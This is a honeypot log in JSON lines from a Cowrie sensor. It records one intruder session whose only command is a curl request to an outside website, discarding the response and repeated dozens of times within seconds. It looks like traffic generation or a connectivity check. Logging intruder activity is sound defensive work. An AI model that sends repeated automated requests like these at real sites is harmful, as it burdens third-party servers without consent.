{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.265321Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.302301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.303628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.342072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.343020Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.380347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.381233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.420299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.421560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.458561Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.459504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.500023Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.500977Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.540651Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.541538Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.579751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.580670Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.619228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.620168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.657414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.658394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.698757Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.699649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.740864Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.742018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.779136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.779972Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.817118Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.817958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.857595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.858770Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.895245Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.896099Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.932791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.933659Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.970355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.971265Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.008827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.009779Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.048361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.049269Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.087174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.088044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.129375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.130461Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.170981Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.172645Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.211040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.211884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.250975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.251950Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.290362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.291493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.329556Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.330434Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.369964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.370917Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.408790Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.409955Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.448428Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.449339Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.486060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.486966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.527255Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.527954Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.564937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.566029Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.603194Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.604193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.641827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.642801Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.684154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.685021Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.726752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.727833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.765176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.766006Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.807093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.807928Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.850800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.851904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.901214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.902069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.946256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.947146Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:49.985037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:49.985937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.029890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.031047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.069942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.070953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.107692Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.108538Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.146174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.147068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.184197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.185332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.221969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.222839Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.260489Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.261294Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.297737Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.298815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.337181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.338082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.374857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.375721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.413525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.414357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.451293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.452117Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.490949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.491845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.531050Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.531853Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.569863Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.570733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.611591Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.612404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.650394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.651235Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.687797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.688649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.727769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.728946Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.765581Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.766403Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.803666Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.804506Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
